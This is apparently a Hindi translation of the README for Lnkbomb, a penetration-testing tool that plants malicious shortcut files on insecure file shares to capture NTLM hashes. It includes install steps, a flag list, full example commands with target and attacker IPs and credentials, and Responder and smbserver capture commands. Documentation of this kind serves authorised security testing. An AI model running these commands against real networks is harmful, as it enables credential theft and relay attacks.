
असुरक्षित फ़ाइल शेयरों से NTLM हैश एकत्र करने के लिए दुर्भावनापूर्ण शॉर्टकट जनरेटर
Lnkbomb का उपयोग असुरक्षित फ़ाइल शेयरों में दुर्भावनापूर्ण शॉर्टकट फ़ाइलें अपलोड करने के लिए किया जाता है। यह कमज़ोरी इसलिए मौजूद है क्योंकि Windows शॉर्टकट फ़ाइल से संबद्ध करने के लिए एक आइकन फ़ाइल की तलाश करता है। इस आइकन फ़ाइल को पेनिट्रेशन टेस्टर की मशीन पर चल रहे Responder या smbserver की ओर निर्देशित किया जा सकता है, ताकि (पीड़ित होस्ट मशीन के कॉन्फ़िगरेशन के अनुसार) NTLMv1 या NTLMv2 हैश एकत्र किए जा सकें। टेस्टर फिर उन एकत्रित हैश को Hashcat जैसे टूल से ऑफ़लाइन क्रैक कर सकता है, या उन्हें आगे के शोषण के लिए ntlmrelayx जैसे टूल पर रिले कर सकता है।
पेलोड फ़ाइल सीधे टेस्टर द्वारा कमांड लाइन में निर्दिष्ट असुरक्षित फ़ाइल पर अपलोड की जाती है। टेस्टर अपना IP पता भी शामिल करता है, जो पेलोड में लिखा जाता है।
संस्करण 2.0 टूल का पूर्ण पुनर्निर्माण है और pysmb लाइब्रेरी का उपयोग करता है, जो बिना प्रमाणीकरण और प्रमाणीकृत पेलोड ड्रॉप की अनुमति देता है।
Lnkbomb स्थापित करना
ध्यान दें कि यह प्रोजेक्ट Windows में लगातार काम करता है। Linux में इसमें समस्याएँ हो सकती हैं।
git clone https://github.com/dievus/lnkbomb.git
निर्देशिका को lnkbomb में बदलें और चलाएँ:
python3 lnkbomb.py -h
यह सहायता मेनू आउटपुट करेगा, जिसमें निम्नलिखित फ़्लैग होंगे:
-h, --help - Lists the help options
-t, --target - Specifies the target IP address
-a, --attacker - Specifies the tester's attack machine IP address
-r, --recover - Used to remove the payload when testing is completed (ex. -r payloadname.url)
-w, --windows - New command - required for setting appropriate ports for Windows shares
-l, --linux - New command - required for setting appropriate ports for Linux shares
-n, --netbios - New command - netbios name for targeted Windows machines must be included
पूर्ण कमांड के उदाहरणों में शामिल हैं:
python3 .\lnkbomb.py -t 192.168.1.79 -a 192.168.1.21 -s Shared -u themayor -p Password123! -n dc01 --windows
python3 .\lnkbomb.py -t 192.168.1.79 -a 192.168.1.21 -s Shared -u themayor -p Password123! -n dc01 --windows -r dicnwdsebl.url
आपको NTLM हैश कैप्चर करने के लिए Responder या smbserver जैसे टूल का उपयोग करना होगा।
responder -I eth0 -dwFP -v
या
smbserver.py . . -smb2support
कृपया याद रखें कि यह टूल केवल एथिकल हैकिंग और पेनिट्रेशन टेस्टिंग उद्देश्यों के लिए बनाया गया है। मैं किसी भी ऐसे व्यवहार का समर्थन नहीं करता जिसमें उन लक्ष्यों का परीक्षण शामिल हो जिनके विरुद्ध परीक्षण करने की आपके पास वर्तमान में अनुमति नहीं है।
लक्ष्य पैचिंग और वर्जनिंग के आधार पर यह टूल काम कर भी सकता है और नहीं भी। उपयोगकर्ता अनुभव भिन्न हो सकता है।
मुझे पता है कि ये .url शॉर्टकट हैं, .lnk एक्सटेंशन नहीं। मैं आपको ट्रिगर करने के लिए ऐसा करता हूँ।